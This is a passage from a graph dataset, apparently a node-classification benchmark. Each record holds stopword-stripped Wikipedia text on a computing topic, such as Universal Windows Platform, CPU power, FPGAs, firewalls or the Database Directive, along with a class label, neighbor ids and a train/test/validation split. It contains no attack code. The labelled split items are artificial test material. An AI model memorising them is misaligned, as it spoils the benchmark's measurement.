    "text": "Universal_Windows_Platform:universal windows platform universal windows platform uwp api created microsoft first introduced windows 10 purpose platform help develop universal apps run windows 10 windows 10 mobile xbox one hololens without need re-written supported windows app development using c++ c vb.net xaml api implemented c++ supported c++ vb.net c f javascript designed extension windows runtime platform first introduced windows server 2012 windows 8 uwp allowed developers create apps would potentially run multiple types devices uwp part windows 10 windows 10 mobile uwp apps run earlier windows versions apps capable implementing platform natively developed using visual studio 2015 visual studio 2017 older metro-style apps windows 8.1 windows phone 8.1 universal 8.1 needed modifications migrate uwp 2015 build keynote microsoft announced collection uwp bridges allow android ios apps ported windows 10 mobile windows bridge android codenamed astoria runtime environment would allow android apps written java c++ run windows 10 mobile published windows store kevin gallo technical lead windows developer platform explained layer contained limitations google mobile services certain core apis available apps deep integration background tasks messaging software would run well environment windows bridge ios codenamed islandwood open-source middleware toolkit allows ios apps developed objective-c ported windows 10 mobile using visual studio 2015 convert xcode project visual studio project early build windows bridge ios released open-source software mit license august 6 2015 android version closed beta february 2016 microsoft announced ceased development windows bridge android citing redundancies due ios already primary platform multi-platform development windows bridge ios produced native code require os-level emulator instead microsoft encouraged use c multi-platform app development using tools xamarin acquired prior announcement windows platform features later versions exclusive uwp software specifically packaged usable architectures existing win32 platform xaml windows forms however 2019 microsoft taken steps reduce parity application platforms make uwp features usable inside non-uwp software microsoft introduced xaml islands method embedding uwp controls widgets non-uwp software part windows 10 may 2019 update stated would also allow uwp functions windows runtime components invoked within non-packaged software uwp extension windows runtime universal windows apps created using uwp longer indicate written specific os manifest build instead target one device families pc smartphone tablet xbox one using universal windows platform bridges extensions allow app automatically utilize capabilities available particular device currently running universal app may run either mobile phone tablet provide suitable experiences universal app running smartphone may start behaving way would running pc phone connected desktop computer suitable docking station games developed uwp subject technical restrictions including incompatibility multi-video card setups difficulties modding game using game programs fraps overlays gaming-oriented chat clients key binding managers uwp support directx 11.1 later games built older directx versions work build 2016 microsoft xbox division head phil spencer announced company attempting address issues would improve viability uwp pc games stating microsoft committed ensuring meet exceed performance expectations full-screen games well additional features including support overlays modding support amd freesync nvidia g-sync technologies disabling v-sync later added uwp epic games founder tim sweeney criticized uwp walled garden since default uwp software may published installed via windows store default requiring changes system settings enable installation external software similarly android additionally certain operating system features exclusive uwp used non-uwp software video games sweeney characterized moves aggressive move microsoft ever made attempting transform pcs closed platform felt moves meant put third-party gaming storefronts steam disadvantage microsoft curtailing users freedom install full-featured pc software subverting rights developers publishers maintain direct relationship customers sweeney argued end-users able download uwp software install manner non-uwp software windows vp kevin gallo addressed sweeney concerns stating windows 10 november update enabled people easily side-load apps default ux required want make windows best development platform regardless technologies used offer tools help developers existing code bases html/javascript .net win32 c++ objective-c bring code windows integrate uwp capabilities xamarin uwp developers reach windows 10 devices use large percentage c code deliver fully native mobile app experiences ios android live interview giant bomb e3 2016 coverage spencer defended mixed reception uwp-exclusive releases stating n't gone swimmingly gone well still definitely concern uwp store somehow linked way nefarious also discussed microsoft relationships third-party developers distributors steam considering service critical part gaming success windows stating microsoft planned continue releasing games platform well going areas cooperate going areas compete end result better gamers spencer also stated friend sweeney frequent contact may 30 2019 microsoft announced would support distribution win32 games microsoft store spencer since promoted head gaming operations microsoft reporting directly ceo satya nadella explained developers preferred architecture allow customization control developers players come expect open windows gaming ecosystem also announced future xbox game studios releases windows would made available third-party storefronts steam rather exclusive microsoft store verge considered developments consistent executives larger strategies surrounding interoperability collaboration competitors admissions microsoft uwp ecosystem failure also citing microsoft efforts decouple uwp-exclusive features platform allow distribution win32 software microsoft store unsuccessful windows 10 mobile",
    "neighbors": [
      11270,
      5643,
      4623,
      4624,
      7701,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      2603,
      5677,
      2101,
      10812,
      3648,
      1089,
      582,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      8296,
      8299,
      622,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      6797,
      2193,
      9874,
      10388,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      10957,
      2782,
      9442,
      4836,
      4326,
      2279,
      10470,
      1770,
      3308,
      10478,
      10993,
      3834,
      1791,
      4352,
      8959,
      11519,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      11549,
      5413,
      5928,
      6441,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      5952,
      3394,
      1347,
      9539,
      9033,
      3922,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      10624,
      3462,
      1418,
      5003,
      5004,
      8080,
      11677,
      8607,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      8122,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      11221,
      1498,
      5594,
      478,
      6114,
      6115,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "None"
  },
  {
    "node_id": 3882,
    "label": 3,
    "text": "CPU_power_dissipation:cpu power dissipation central processing unit power dissipation cpu power dissipation process central processing units cpus consume electrical energy dissipate energy form heat due resistance electronic circuits designing cpus perform tasks efficiently without overheating major consideration nearly cpu manufacturers date cpu implementations use little power example cpus mobile phones often use watts electricity microcontrollers used embedded systems may consume milliwatts even little microwatts comparison cpus general-purpose personal computers desktops laptops dissipate significantly power higher complexity speed microelectronic cpus may consume power order watts hundreds watts historically early cpus implemented vacuum tubes consumed power order many kilowatts cpus desktop computers typically use significant portion power consumed computer major uses include fast video cards contain graphics processing units power supplies laptops lcd backlight also uses significant portion overall power energy-saving features instituted personal computers idle overall consumption today high-performance cpus considerable strong contrast much lower energy consumption cpus designed low-power devices one cpu intel xscale run 600 mhz consuming 1 w power whereas intel x86 pc processors performance bracket consume times energy engineering reasons pattern processor manufacturers usually release two power consumption numbers cpu example pentium 4 2.8 ghz 68.4 w typical thermal power 85 w maximum thermal power cpu idle draw far less typical thermal power datasheets normally contain thermal design power tdp maximum amount heat generated cpu cooling system computer required dissipate intel advanced micro devices amd defined tdp maximum heat generation thermally significant periods running worst-case non-synthetic workloads thus tdp reflecting actual maximum power processor ensures computer able handle essentially applications without exceeding thermal envelope requiring cooling system maximum theoretical power would cost favor extra headroom processing power many applications cpu components idle much time idle power contributes significantly overall system power usage cpu uses power management features reduce energy use components motherboard chipset take larger proportion computer energy applications computer often heavily loaded scientific computing performance per watt much computing cpu per unit energy becomes significant several factors contributing cpu power consumption include dynamic power consumption short-circuit power consumption power loss due transistor leakage currents formula_1 dynamic power consumption originates activity logic gates inside cpu logic gates toggle energy flowing capacitors inside charged discharged dynamic power consumed cpu approximately proportional cpu frequency square cpu voltage capacitance frequency voltage logic gates toggle transistors inside may change states takes finite amount time may happen brief amount time transistors conducting simultaneously direct path source ground results short-circuit power loss magnitude power dependent logic gate rather complex model macro level power consumption due leakage power emanates micro-level transistors small amounts currents always flowing differently doped parts transistor magnitude currents depend state transistor dimensions physical properties sometimes temperature total amount leakage currents tends inflate increasing temperature decreasing transistor sizes dynamic short-circuit power consumption dependent clock frequency leakage current dependent cpu supply voltage shown energy consumption program shows convex energy behavior meaning exists optimal cpu frequency energy consumption minimal power consumption reduced several ways including following historically processor manufacturers consistently delivered increases clock rates instruction-level parallelism single-threaded code executed faster newer processors modification recently order manage cpu power dissipation processor makers favor multi-core chip designs thus software needs written multi-threaded multi-process manner take full advantage hardware many multi-threaded development paradigms introduce overhead see linear increase speed compared number processors particularly true accessing shared dependent resources due lock contention effect becomes noticeable number processors increases recently ibm exploring ways distribute computing power efficiently mimicking distributional properties human brain",
    "neighbors": [
      3596,
      3352,
      6815,
      2081,
      10658,
      10664,
      4270,
      4276,
      7604,
      5948,
      2492,
      1480,
      2516,
      10966,
      2273,
      229,
      10601,
      3565,
      4334,
      1776,
      499,
      4596,
      1911
    ],
    "mask": "Test"
  },
  {
    "node_id": 3883,
    "label": 3,
    "text": "VIA_Technologies:via technologies via technologies inc. taiwanese manufacturer integrated circuits mainly motherboard chipsets cpus memory world largest independent manufacturer motherboard chipsets fabless semiconductor company via conducts research development chipsets in-house subcontracts actual silicon manufacturing third-party merchant foundries tsmc company founded 1987 fremont california usa cher wang 1992 decided move headquarters taipei taiwan order establish closer partnerships substantial growing manufacturing base taiwan neighbouring china 1999 via acquired cyrix division national semiconductor year via acquired centaur technology integrated device technology marking entry x86 microprocessor market via maker via c3 via c7 via nano processors epia platform cyrix mediagx platform remained national semiconductor 2001 via established s3 graphics joint venture january 2005 via began via pc-1 initiative develop information communication technology systems benefit access computers internet february 2005 via celebrated production 100 millionth via amd chipset 29 august 2008 via announced would release official 2d accelerated linux drivers chipsets would also release 3d accelerated drivers 2013 via entered agreement shanghai municipal government create fabless semiconductor company called zhaoxin joint venture producing x86 compatible cpus chinese market via business focuses integrated chipsets pc market among pc users via best known motherboard core-logic chipsets however via products include audio controllers network/connectivity controllers low-power cpus even cd/dvd-writer chipsets pc peripheral vendors asus buy chipsets inclusion product brands late 1990s via began diversifying core-logic business company since made business acquisitions form cpu division graphics division sound division advances silicon manufacturing continue increase level integration functionality chipsets via need divisions remain competitive core-logic market via produced multiple x86 compatible cpus acquisitions cyrix centaur technology via still produces cpus zhaoxin joint venture via x86 processors also contain undocumented alternate instruction set via established important supplier pc components chipsets socket 7 platform apollo vp3 chipset via pioneered agp support socket 7 processors via present market position derives success pentium iii chipsets intel discontinued development sdram chipsets stated policy rdram memory would supported going forward since rdram expensive offered obvious performance advantages manufacturers found could ship performance-equivalent pcs lower cost using via chipsets response increasing market competition via decided buy ailing s3 graphics business savage chipset fast enough survive discrete solution low manufacturing cost made ideal integrated solution part via northbridge via s3 brand generally held onto 10 share pc graphics market behind intel amd nvidia via also includes via envy soundcard motherboards offers 24-bit sound pentium 4 chipset designs struggled win market share face legal threats intel k8t800 chipset athlon 64 popular via also continued development via c3 via c7 processors targeting small light low power applications market space via successful january 2008 via unveiled via nano 11 mm × 11 mm footprint vm-enabled x86-64 processor debuted may 2008 ultra-mobile pcs basis idt centaur acquisition via appears come possession least three patents cover key aspects processor technology used intel basis negotiating leverage patents offered 2003 via arrived agreement intel allowed ten-year patent cross license enabling via continue design manufacture x86 compatible cpus via also granted three-year grace period could continue use intel socket infrastructure",
    "neighbors": [
      3459,
      3588,
      4228,
      5380,
      9863,
      6924,
      1677,
      6670,
      7311,
      11405,
      7442,
      405,
      3352,
      9851,
      4252,
      799,
      5028,
      4902,
      2088,
      8237,
      4270,
      5681,
      9137,
      8250,
      10820,
      9541,
      455,
      3911,
      7113,
      2506,
      977,
      9042,
      10966,
      4569,
      9307,
      10715,
      2525,
      10971,
      9567,
      7008,
      10337,
      8035,
      2788,
      8931,
      10468,
      2791,
      10601,
      1260,
      5356,
      7151,
      1776,
      10095,
      499,
      4603,
      1915
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3884,
    "label": 4,
    "text": "Usenet_Death_Penalty:usenet death penalty usenet usenet death penalty udp final penalty may issued internet service providers single users produce much spam fail adhere usenet standards messages fall jurisdiction usenet death penalty cancelled cancelled messages deleted usenet servers allowed propagate causes users affected isp unable post usenet puts pressure isp change policies notable cases include actions taken uunet compuserve excite home three types usenet death penalty effective udp must supported large number servers majority major transit servers otherwise articles propagate throughout smaller slower peerings udps casual acts announced beforehand owner offending server contacted given several chances correct perceived problem since effects users server udp significant users want post impact udp induce operators offending server address problems quickly udps issued america online bbn planet compuserve erols internet netcom tiac uunet first udp software written karl kleinpaste 1990 though disagreement term coined net abuse faq claims 1993 message posted 18 august year claims coined years earlier eliot lear udp implemented uunet 1 august 1997 became host many spammers unresponsive abuse complaints forced provider implement antispam policies tools close open relays executives called udp digital terrorism threatened legal action asserted planning move spammers anyway volume spam uunet decreased organizers called penalty august 6 though announcement stifled cancel messages udp opponents active udp implemented compuserve 18 november 1997 lifted following day company implemented anti-spamming measures instituted new acceptable use policy addressing spamming udp scheduled begin excite home 19 january 2000 lifted day scheduled begin isp began scanning misconfigured proxy servers home users computers blamed spam originating network",
    "neighbors": [
      4331,
      1188,
      3350
    ],
    "mask": "Test"
  },
  {
    "node_id": 3885,
    "label": 4,
    "text": "Comparison_of_firewalls:comparison firewalls following comparison notable firewalls starting simple home firewalls sophisticated enterprise-level firewalls firewall solutions provided software solutions run general purpose operating systems following table lists different firewall software installed configured different general purpose operating systems general computer appliance computing device specific function limited configuration ability software appliance set computer programs might combined enough operating system jeos run optimally industry standard computer hardware virtual machine firewall appliance combination firewall software operating system purposely built run firewall system dedicated hardware virtual machine include following table lists different firewall appliances features strictly firewall features sometimes bundled firewall software exist platform note features marked yes even implemented separate module comes platform firewall sits ids real-time firewall logs/sniffs/blocks suspicious connections part rule-set vpn virtual private network types pptp l2tp mpls ipsec ssl/ssh profile selection user switch sets firewall settings e.g use work home public connections",
    "neighbors": [
      2049,
      2563,
      4611,
      10772,
      550,
      10790,
      6699,
      8753,
      4659,
      569,
      5178,
      9279,
      2118,
      9806,
      8784,
      9817,
      9320,
      8816,
      5749,
      10872,
      5245,
      6797,
      1172,
      3732,
      2721,
      3243,
      1708,
      704,
      10433,
      9927,
      5322,
      4814,
      9423,
      10451,
      1242,
      6364,
      3299,
      5860,
      4843,
      10987,
      8943,
      9971,
      1273,
      9983,
      1792,
      2825,
      7948,
      8467,
      1814,
      9496,
      6431,
      10531,
      5924,
      8998,
      2859,
      7983,
      7473,
      4403,
      3381,
      823,
      11577,
      11073,
      1858,
      2375,
      5959,
      6985,
      10574,
      11086,
      4435,
      9048,
      4953,
      2907,
      9055,
      3941,
      3942,
      4464,
      5491,
      4480,
      1417,
      3482,
      1436,
      4511,
      8615,
      3500,
      10166,
      9151,
      5057,
      7121,
      10708,
      2005,
      4568,
      8668,
      10732,
      6643
    ],
    "mask": "Train"
  },
  {
    "node_id": 3886,
    "label": 3,
    "text": "Field-programmable_gate_array:field-programmable gate array field-programmable gate array fpga integrated circuit designed configured customer designer manufacturinghence term field-programmable fpga configuration generally specified using hardware description language hdl similar used application-specific integrated circuit asic circuit diagrams previously used specify configuration increasingly rare due advent electronic design automation tools fpgas contain array programmable logic blocks hierarchy reconfigurable interconnects allow blocks wired together like many logic gates inter-wired different configurations logic blocks configured perform complex combinational functions merely simple logic gates like xor fpgas logic blocks also include memory elements may simple flip-flops complete blocks memory many fpgas reprogrammed implement different logic functions allowing flexible reconfigurable computing performed computer software contemporary field-programmable gate arrays fpgas large resources logic gates ram blocks implement complex digital computations fpga designs employ fast i/o rates bidirectional data buses becomes challenge verify correct timing valid data within setup time hold time floor planning enables resource allocation within fpgas meet time constraints fpgas used implement logical function asic perform ability update functionality shipping partial re-configuration portion design low non-recurring engineering costs relative asic design notwithstanding generally higher unit cost offer advantages many applications fpgas analog features addition digital functions common analog feature programmable slew rate output pin allowing engineer set low rates lightly loaded pins would otherwise ring couple unacceptably set higher rates heavily loaded pins high-speed channels would otherwise run slowly also common quartz-crystal oscillators on-chip resistance-capacitance oscillators phase-locked loops embedded voltage-controlled oscillators used clock generation management high-speed serializer-deserializer serdes transmit clocks receiver clock recovery fairly common differential comparators input pins designed connected differential signaling channels mixed signal fpgas integrated peripheral analog-to-digital converters adcs digital-to-analog converters dacs analog signal conditioning blocks allowing operate system-on-a-chip soc devices blur line fpga carries digital ones zeros internal programmable interconnect fabric field-programmable analog array fpaa carries analog values internal programmable interconnect fabric fpga industry sprouted programmable read-only memory prom programmable logic devices plds proms plds option programmed batches factory field field-programmable however programmable logic hard-wired logic gates altera founded 1983 delivered industry first reprogrammable logic device 1984 – ep300 – featured quartz window package allowed users shine ultra-violet lamp die erase eprom cells held device configuration december 2015 intel acquired altera xilinx co-founders ross freeman bernard vonderschmitt invented first commercially viable field-programmable gate array 1985 – xc2064 xc2064 programmable gates programmable interconnects gates beginnings new technology market xc2064 64 configurable logic blocks clbs two three-input lookup tables luts 20 years later freeman entered national inventors hall fame invention 1987 naval surface warfare center funded experiment proposed steve casselman develop computer would implement 600,000 reprogrammable gates casselman successful patent related system issued 1992 altera xilinx continued unchallenged quickly grew 1985 mid-1990s competitors sprouted eroding significant market share 1993 actel microsemi serving 18 percent market 2013 altera 31 percent actel 10 percent xilinx 36 percent together represented approximately 77 percent fpga market 1990s period rapid growth fpgas circuit sophistication volume production early 1990s fpgas primarily used telecommunications networking end decade fpgas found way consumer automotive industrial applications companies like microsoft started use fpgas accelerate high-performance computationally intensive systems like data centers operate bing search engine due performance per watt advantage fpgas deliver microsoft began using fpgas accelerate bing 2014 2018 began deploying fpgas across data center workloads azure cloud computing platform 2012 coarse-grained architectural approach taken step combining logic blocks interconnects traditional fpgas embedded microprocessors related peripherals form complete system programmable chip work mirrors architecture created ron perlof hana potash burroughs advanced systems group 1982 combined reconfigurable cpu architecture single chip called sb24 examples hybrid technologies found xilinx zynq-7000 programmable soc includes 1.0 ghz dual-core arm cortex-a9 mpcore processor embedded within fpga logic fabric altera arria v fpga includes 800 mhz dual-core arm cortex-a9 mpcore atmel fpslic another device uses avr processor combination atmel programmable logic architecture microsemi smartfusion devices incorporate arm cortex-m3 hard processor core 512 kb flash 64 kb ram analog peripherals multi-channel analog-to-digital converters digital-to-analog converters flash memory-based fpga fabric alternate approach using hard-macro processors make use soft processor ip cores implemented within fpga logic nios ii microblaze mico32 examples popular softcore processors many modern fpgas programmed run time led idea reconfigurable computing reconfigurable systems – cpus reconfigure suit task hand additionally new non-fpga architectures beginning emerge software-configurable microprocessors stretch s5000 adopt hybrid approach providing array processor cores fpga-like programmable cores chip design start new custom design implementation fpga historically fpgas slower less energy efficient generally achieved less functionality fixed asic counterparts older study showed designs implemented fpgas need average 40 times much area draw 12 times much dynamic power run one third speed corresponding asic implementations recently fpgas xilinx virtex-7 altera stratix 5 come rival corresponding asic assp application-specific standard part standalone usb interface chip solutions providing significantly reduced power usage increased speed lower materials cost minimal implementation real-estate increased possibilities re-configuration 'on-the-fly design included 6 10 asics achieved using one fpga advantages fpgas include ability re-program already deployed i.e field fix bugs often include shorter time market lower non-recurring engineering costs vendors also take middle road via fpga prototyping developing prototype hardware fpgas manufacture final version asic longer modified design committed xilinx claimed several market technology dynamics changing asic/fpga paradigm february 2009 trends make fpgas better alternative asics larger number higher-volume applications historically used company attributes growing number fpga design starts see fpgas capability partial re-configuration lets one portion device re-programmed portions continue running primary differences complex programmable logic devices cplds fpgas architectural cpld comparatively restrictive structure consisting one programmable sum-of-products logic arrays feeding relatively small number clocked registers result cplds less flexible advantage predictable timing delays fpga architectures hand dominated interconnect makes far flexible terms range designs practical implementation also far complex design least requiring complex electronic design automation eda software practice distinction fpgas cplds often one size fpgas usually much larger terms resources cplds typically fpgas contain complex embedded functions adders multipliers memory serializer/deserializers another common distinction cplds contain embedded flash memory store configuration fpgas usually require external non-volatile memory always design requires simple instant-on logic already configured power-up cplds generally preferred applications fpgas generally preferred sometimes cplds fpgas used single system design designs cplds generally perform glue logic functions responsible “ booting ” fpga well controlling reset boot sequence complete circuit board therefore depending application may judicious use fpgas cplds single design fpgas advantages disadvantages compared asics secure microprocessors concerning hardware security fpgas flexibility makes malicious modifications fabrication lower risk previously many fpgas design bitstream exposed fpga loads external memory typically every power-on major fpga vendors offer spectrum security solutions designers bitstream encryption authentication example altera xilinx offer aes encryption 256-bit bitstreams stored external flash memory fpgas store configuration internally nonvolatile flash memory microsemi proasic 3 lattice xp2 programmable devices expose bitstream need encryption addition flash memory lookup table provides single event upset protection space applications customers wanting higher guarantee tamper resistance use write-once antifuse fpgas vendors microsemi stratix 10 fpgas socs altera introduced secure device manager physically uncloneable functions provide high levels protection physical attacks 2012 researchers sergei skorobogatov christopher woods demonstrated fpgas vulnerable hostile intent discovered critical backdoor vulnerability manufactured silicon part actel/microsemi proasic 3 making vulnerable many levels reprogramming crypto access keys accessing unencrypted bitstream modifying low-level silicon features extracting configuration data fpga used solve problem computable trivially proven fact fpgas used implement soft microprocessor xilinx microblaze altera nios ii advantage lies significantly faster applications parallel nature optimality terms number gates used certain processes fpgas originally began competitors cplds implement glue logic printed circuit boards size capabilities speed increased fpgas took additional functions point marketed full systems chips socs particularly introduction dedicated multipliers fpga architectures late 1990s applications traditionally sole reserve digital signal processor hardware dsps began incorporate fpgas instead another trend use fpgas hardware acceleration one use fpga accelerate certain parts algorithm share part computation fpga generic processor search engine bing noted adopting fpga acceleration search algorithm 2014. fpgas seeing increased use ai accelerators including microsoft so-termed project catapult accelerating artificial neural networks machine learning applications traditionally fpgas reserved specific vertical applications volume production small low-volume applications premium companies pay hardware cost per unit programmable chip affordable development resources spent creating asic new cost performance dynamics broadened range viable applications common fpga architecture consists array logic blocks i/o pads routing channels generally routing channels width number wires multiple i/o pads may fit height one row width one column array application circuit must mapped fpga adequate resources number clbs/labs i/os required easily determined design number routing tracks needed may vary considerably even among designs amount logic example crossbar switch requires much routing systolic array gate count since unused routing tracks increase cost decrease performance part without providing benefit fpga manufacturers try provide enough tracks designs fit terms lookup tables luts i/os routed determined estimates derived rent rule experiments existing designs network-on-chip architectures routing interconnection developed general logic block consists logical cells called alm le slice etc. typical cell consists 4-input lut full adder fa d-type flip-flop shown luts figure split two 3-input luts normal mode combined 4-input lut left multiplexer mux arithmetic mode outputs fed adder selection mode programmed middle mux output either synchronous asynchronous depending programming mux right figure example practice entire parts adder stored functions luts order save space modern fpga families expand upon capabilities include higher level functionality fixed silicon common functions embedded circuit reduces area required gives functions increased speed compared building logical primitives examples include multipliers generic dsp blocks embedded processors high speed i/o logic embedded memories higher-end fpgas contain high speed multi-gigabit transceivers hard ip cores processor cores ethernet medium access control units pci/pci express controllers external memory controllers cores exist alongside programmable fabric built transistors instead luts asic-level performance power consumption without consuming significant amount fabric resources leaving fabric free application-specific logic multi-gigabit transceivers also contain high performance analog input output circuitry along high-speed serializers deserializers components built luts higher-level physical layer phy functionality line coding may may implemented alongside serializers deserializers hard logic depending fpga circuitry built inside fpga synchronous circuitry requires clock signal fpgas contain dedicated global regional routing networks clock reset delivered minimal skew also fpgas generally contain analog phase-locked loop and/or delay-locked loop components synthesize new clock frequencies well attenuate jitter complex designs use multiple clocks different frequency phase relationships forming separate clock domains clock signals generated locally oscillator recovered high speed serial data stream care must taken building clock domain crossing circuitry avoid metastability fpgas generally contain block rams capable working dual port rams different clocks aiding construction building fifos dual port buffers connect differing clock domains shrink size power consumption fpgas vendors tabula xilinx introduced 3d stacked architectures following introduction 28 nm 7-series fpgas xilinx said several highest-density parts fpga product lines constructed using multiple dies one package employing technology developed 3d construction stacked-die assemblies xilinx approach stacks several three four active fpga dies side-by-side silicon interposer – single piece silicon carries passive interconnect multi-die construction also allows different parts fpga created different process technologies process requirements different fpga fabric high speed 28 gbit/s serial transceivers fpga built way called heterogeneous fpga altera heterogeneous approach involves using single monolithic fpga die connecting die/technologies fpga using intel embedded multi-die interconnect bridge emib technology labview define behavior fpga user provides design hardware description language hdl schematic design hdl form suited work large structures possible specify high-level functional behavior rather drawing every piece hand however schematic entry allow easier visualization design component modules using electronic design automation tool technology-mapped netlist generated netlist fit actual fpga architecture using process called place-and-route usually performed fpga company proprietary place-and-route software user validate map place route results via timing analysis simulation verification validation methodologies design validation process complete binary file generated typically using fpga vendor proprietary software used re- configure fpga file transferred fpga/cpld via serial interface jtag external memory device like eeprom common hdls vhdl verilog well extensions systemverilog however attempt reduce complexity designing hdls compared equivalent assembly languages moves raise abstraction level introduction alternative languages national instruments labview graphical programming language sometimes referred g fpga add-in module available target program fpga hardware simplify design complex systems fpgas exist libraries predefined complex functions circuits tested optimized speed design process predefined circuits commonly called intellectual property ip cores available fpga vendors third-party ip suppliers rarely free typically released proprietary licenses predefined circuits available developer communities opencores typically released free open source licenses gpl bsd similar license sources designs known open-source hardware typical design flow fpga application developer simulate design multiple stages throughout design process initially rtl description vhdl verilog simulated creating test benches simulate system observe results synthesis engine mapped design netlist netlist translated gate-level description simulation repeated confirm synthesis proceeded without errors finally design laid fpga point propagation delays added simulation run values back-annotated onto netlist recently opencl open computing language used programmers take advantage performance power efficiencies fpgas provide opencl allows programmers develop code c programming language target fpga functions opencl kernels using opencl constructs information see high-level synthesis c hdl 2016 long-time industry rivals xilinx altera intel subsidiary fpga market leaders time controlled nearly 90 percent market xilinx altera provide proprietary electronic design automation software windows linux ise/vivado quartus enables engineers design analyze simulate synthesize compile designs manufacturers include march 2010 tabula announced fpga technology uses time-multiplexed logic interconnect claims potential cost savings high-density applications march 24 2015 tabula officially shut june 1 2015 intel announced would acquire altera approximately 16.7 billion completed acquisition december 30 2015",
    "neighbors": [
      516,
      5636,
      7173,
      1032,
      9739,
      7699,
      5655,
      8732,
      10781,
      10789,
      8231,
      2605,
      3629,
      7218,
      6716,
      1087,
      2623,
      2113,
      7234,
      7745,
      11333,
      3142,
      2638,
      10833,
      3159,
      3168,
      1122,
      4194,
      3175,
      107,
      11374,
      8815,
      630,
      8822,
      6268,
      8326,
      4743,
      6797,
      7313,
      9366,
      154,
      9371,
      6815,
      8352,
      5793,
      6818,
      4773,
      6821,
      10921,
      682,
      7852,
      7341,
      9391,
      2224,
      3762,
      7858,
      9911,
      11447,
      8890,
      4286,
      2241,
      2243,
      4811,
      9932,
      5329,
      10966,
      731,
      10971,
      11487,
      5861,
      5862,
      7911,
      10985,
      1770,
      5355,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      2811,
      8700,
      1798,
      3847,
      5389,
      6926,
      6415,
      1298,
      6950,
      7471,
      309,
      8501,
      823,
      5433,
      2874,
      5948,
      8508,
      4928,
      8514,
      6468,
      6476,
      7505,
      9044,
      11604,
      343,
      2394,
      8543,
      1376,
      4964,
      10085,
      10603,
      4465,
      11125,
      886,
      1399,
      7033,
      1402,
      3457,
      4995,
      7556,
      398,
      1935,
      3470,
      5523,
      2968,
      1952,
      10658,
      9126,
      428,
      10669,
      1967,
      2480,
      8625,
      10675,
      1461,
      1463,
      7607,
      4030,
      11200,
      4036,
      3014,
      1480,
      466,
      1499,
      477,
      1502,
      5090,
      995,
      8675,
      2533,
      9707,
      10734,
      6639,
      499,
      4596,
      10230,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 3887,
    "label": 4,
    "text": "Security_testing:security testing security testing process intended reveal flaws security mechanisms information system protect data maintain functionality intended due logical limitations security testing passing security testing indication flaws exist system adequately satisfies security requirements typical security requirements may include specific elements confidentiality integrity authentication availability authorization non-repudiation actual security requirements tested depend security requirements implemented system security testing term number different meanings completed number different ways security taxonomy helps us understand different approaches meanings providing base level work integrity information refers protecting information modified unauthorized parties might involve confirming identity person tracing origins artifact ensuring product packaging labeling claims assuring computer program trusted one common terms used delivery security testing",
    "neighbors": [
      5636,
      10756,
      9356,
      3473,
      8978,
      5245,
      10392,
      4892,
      5404,
      2975,
      2213,
      8998,
      939,
      3629,
      9646,
      7855,
      2737,
      1970,
      7989,
      5433,
      7739,
      7228,
      3262,
      9791,
      3525,
      2558,
      11333,
      7368,
      9160,
      3796,
      2262,
      10070,
      9688,
      7515,
      10718,
      3941,
      6373,
      107,
      11244,
      8047,
      2041,
      5373,
      5246
    ],
    "mask": "Test"
  },
  {
    "node_id": 3888,
    "label": 1,
    "text": "Database_Directive:database directive directive 96/9/ec european parliament council 11 march 1996 legal protection databases directive european union field copyright law made internal market provisions treaty rome harmonises treatment databases copyright law sui generis right creators databases qualify copyright article 1 2 defines database collection independent works data materials arranged systematic methodical way individually accessible electronic means non-electronic databases also covered para 14 preamble computer program used create database included para 23 preamble copyright protection software governed directive 91/250/eec article 3 databases reason selection arrangement contents constitute author intellectual creation protected copyright collections criterion may used member states may relaxation criterion protection collections berne convention protection literary artistic works covers collections literary artistic works requires creativity selection arrangement contents practice difference likely slight copyright database separate without prejudice copyright entries acts restricted copyright similar types work art 5 shall prevent lawful use database lawful user art 6 1 member states may provide following limitations art 6 2 well applying traditional limitations copyright copyright protection usually lasts seventy years death last publicly identified author anonymous pseudonymous works gain protection later 70 years work lawfully made available public 70 years creation national legislation makes particular provision collective works legal person i.e body corporate rights holder term protection calculated way anonymous pseudonymous works exception natural persons created work given credit versions made available public term protection calculated according lives authors art 1 directive 93/98/eec copyright protection available databases aim complete entries selected objective criteria covered sui generis database rights copyright protects creativity author database rights specifically protect qualitatively and/or quantitatively substantial investment either obtaining verification presentation contents substantial investment need financial database protected art 7 1 database rights held first instance person corporation made substantial investment long article 11 3 provides negotiation treaties ensure reciprocal treatment outside eu 2006 treaty exists holder database rights may prohibit extraction and/or re-utilization whole substantial part contents substantial part evaluated qualitatively and/or quantitatively reutilisation subject exhaustion rights public lending act extraction re-utilization lawful user database available public may freely extract and/or re-use insubstantial parts database art 8 holder database rights may place restrictions purpose insubstantial parts used however users may perform acts conflict normal exploitation database unreasonably prejudice legitimate interests maker database prejudice copyright entries limitations may provided database rights copyright databases art 9 database rights last fifteen years end year database made available public end year completion private databases art 10 substantial change could considered substantial new investment lead new term database rights could principle perpetual database rights independent copyright database two could principle held different people especially jurisdictions prohibit corporate ownership copyright database rights compared rights phonogram film producers",
    "neighbors": [
      8440,
      385,
      10136,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3889,
    "label": 2,
